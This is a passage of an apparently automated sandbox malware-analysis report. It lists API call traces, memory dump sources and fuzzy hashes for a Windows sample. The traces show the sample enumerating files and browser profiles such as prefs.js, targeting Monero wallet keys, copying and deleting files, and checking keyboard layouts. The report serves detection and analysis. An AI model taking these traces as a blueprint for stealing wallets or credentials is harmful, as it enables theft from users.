                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 495fdbc1104f8b0c5525cf939cc006979bad715b3cf419c8da8e2cd9dcd15298
                              • Instruction ID: 2b687ed4e12ca080d8043852e855e51006bda27a38e8105f3614e78126ffa0f1
                              • Opcode Fuzzy Hash: 495fdbc1104f8b0c5525cf939cc006979bad715b3cf419c8da8e2cd9dcd15298
                              • Instruction Fuzzy Hash: 865136B2900218ABCB24EBB4DC45EEE737CFB98300F444598B65D96140DB75DB899F72
                              APIs
                              • wsprintfA.USER32 ref: 00D3ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 00D3ED55
                              • StrCmpCA.SHLWAPI(?,00D51538), ref: 00D3EDAB
                              • StrCmpCA.SHLWAPI(?,00D5153C), ref: 00D3EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3F2AE
                              • FindClose.KERNEL32(000000FF), ref: 00D3F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: bd219b53c6d2f73af22e2400b2e8c6bc06ac30b17d145bd77658a742e9b304b5
                              • Instruction ID: f3e1a19a09c6271c50a2559fd4154a2a590b6aa7f23adb607653ab60b373f78c
                              • Opcode Fuzzy Hash: bd219b53c6d2f73af22e2400b2e8c6bc06ac30b17d145bd77658a742e9b304b5
                              • Instruction Fuzzy Hash: 10E1AF72951128ABFB55FB64DC52EEE7338EF54300F414599B50A62092EE306F8ACF72
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D515B8,00D50D96), ref: 00D3F71E
                              • StrCmpCA.SHLWAPI(?,00D515BC), ref: 00D3F76F
                              • StrCmpCA.SHLWAPI(?,00D515C0), ref: 00D3F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3FAB1
                              • FindClose.KERNEL32(000000FF), ref: 00D3FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: a3cd4836a864f57e3d0fc1bdf0ea92f80c8b2f7f4746d7d0a8274efaf37da962
                              • Instruction ID: f50455b1ed5ae4b23b5da05b335e6b5f6252c761a3fe7b043a96e919945107a9
                              • Opcode Fuzzy Hash: a3cd4836a864f57e3d0fc1bdf0ea92f80c8b2f7f4746d7d0a8274efaf37da962
                              • Instruction Fuzzy Hash: 83B103719401189BDB24FF64DC96FEE7379EF94300F4085A9A80A96151EF30AB49CFB2
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D5510C,?,?,?,00D551B4,?,?,00000000,?,00000000), ref: 00D31923
                              • StrCmpCA.SHLWAPI(?,00D5525C), ref: 00D31973
                              • StrCmpCA.SHLWAPI(?,00D55304), ref: 00D31989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D31D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00D31DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D31E20
                              • FindClose.KERNEL32(000000FF), ref: 00D31E32
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 307d2676bb44fb0f51457fbe206a264cf2ce1c9af28c372b4407ceadba99cc0f
                              • Instruction ID: 3f16e45d94f0651284f9f78644363def1c608f383060d45a0d1f022562ed99cb
                              • Opcode Fuzzy Hash: 307d2676bb44fb0f51457fbe206a264cf2ce1c9af28c372b4407ceadba99cc0f
                              • Instruction Fuzzy Hash: 90121E71950118ABEB19FB64DC96EEE7378EF54300F4145A9B50A62091EF306F89CFB2
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00D50C2E), ref: 00D3DE5E
                              • StrCmpCA.SHLWAPI(?,00D514C8), ref: 00D3DEAE
                              • StrCmpCA.SHLWAPI(?,00D514CC), ref: 00D3DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3E3E0
                              • FindClose.KERNEL32(000000FF), ref: 00D3E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 504100a35f5cb9b439495369eb2b799f265f7f74aad5cee2d5b58942fae4c3a1
                              • Instruction ID: f0ae026ba27d94ff183f41b72f25efc8ffa20efc66cdbcbc9526c5bfa3761740
                              • Opcode Fuzzy Hash: 504100a35f5cb9b439495369eb2b799f265f7f74aad5cee2d5b58942fae4c3a1
                              • Instruction Fuzzy Hash: 79F17D718541289BEB15EB64DC96EEE7338FF54304F9141DAA41A62091EF306F8ACF72
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D514B0,00D50C2A), ref: 00D3DAEB
                              • StrCmpCA.SHLWAPI(?,00D514B4), ref: 00D3DB33
                              • StrCmpCA.SHLWAPI(?,00D514B8), ref: 00D3DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3DDCC
                              • FindClose.KERNEL32(000000FF), ref: 00D3DDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: d90b50e7fed52864b823f5638cac0e13bfb08ff1679b0e3caadcf5b87076b36a
                              • Instruction ID: 029664e6f4bb696c25dc6c440fec34672b04335a7a58fe3eb093ca3f7ac7904c
                              • Opcode Fuzzy Hash: d90b50e7fed52864b823f5638cac0e13bfb08ff1679b0e3caadcf5b87076b36a
                              • Instruction Fuzzy Hash: 64913172900118ABDB14FB74EC569ED737DEF94300F418668F90A96181EE349B598FB3
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,00D505AF), ref: 00D47BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00D47BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00D47C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00D47C62
                              • LocalFree.KERNEL32(00000000), ref: 00D47D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 19081bb7519234a8a14033a5ae626fcef186d9597edc4f6a8943596b3cd0944a
                              • Instruction ID: d7bd04513c9b0b82fe4e31eba809ba8bffe8b2b198257dc52f367b5b45b236f8
                              • Opcode Fuzzy Hash: 19081bb7519234a8a14033a5ae626fcef186d9597edc4f6a8943596b3cd0944a
                              • Instruction Fuzzy Hash: DF413C71940218ABDB24DF94DC99BEEB7B8FF44700F204199E50962191DB346F89CFB2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: \w$%}?{$Fvdn$tm8$yL`_$5}]$5}]
                              • API String ID: 0-397602185
                              • Opcode ID: 0f0681c78dc62db753c32110e57e400e5f994c06e796bb101027d6a22832c72c
                              • Instruction ID: c00f5dd85189bb927e15d5ad19c2e6e155c13ba2ffc0443d775c098acc941f27
                              • Opcode Fuzzy Hash: 0f0681c78dc62db753c32110e57e400e5f994c06e796bb101027d6a22832c72c
                              • Instruction Fuzzy Hash: BAB2E6F3A082049FE304AE2DDC4577ABBE9EF94720F1A493DEAC4D7744E63598018697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #PD]$OB:g$WGnu$WGnu$aO{$t|u;$ti^
                              • API String ID: 0-1614462848
                              • Opcode ID: 161d9c498fab733d8a599ff864405373575c539d673dc6b17503f98069699f3f
                              • Instruction ID: 0b0f960c6b373628db77fa5a85328b67932eba36b9ab407b96513b6c5a0e55f4
                              • Opcode Fuzzy Hash: 161d9c498fab733d8a599ff864405373575c539d673dc6b17503f98069699f3f
                              • Instruction Fuzzy Hash: 0FA25AF3A0C2149FE3046E2DEC8567ABBE9EF94320F1A463DEAC4C7744E97558018697
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00D50D73), ref: 00D3E4A2
                              • StrCmpCA.SHLWAPI(?,00D514F8), ref: 00D3E4F2
                              • StrCmpCA.SHLWAPI(?,00D514FC), ref: 00D3E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: c7a8b874b4bbe4933a86301a47f63894918a4bbb2b034be2823b5feb71d7feb0
                              • Instruction ID: 6be5f57856d81976af004421d3024e42322c7e323ee9f88ee36b442bd0c6d416
                              • Opcode Fuzzy Hash: c7a8b874b4bbe4933a86301a47f63894918a4bbb2b034be2823b5feb71d7feb0
                              • Instruction Fuzzy Hash: 74121072950118ABEB14FB64DC96EED7378EF94300F4145A9B50AA6091EF306F49CFB2
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00D3C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00D3C87C
                              • lstrcat.KERNEL32(?,00D50B46), ref: 00D3C943
                              • lstrcat.KERNEL32(?,00D50B47), ref: 00D3C957
                              • lstrcat.KERNEL32(?,00D50B4E), ref: 00D3C978
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
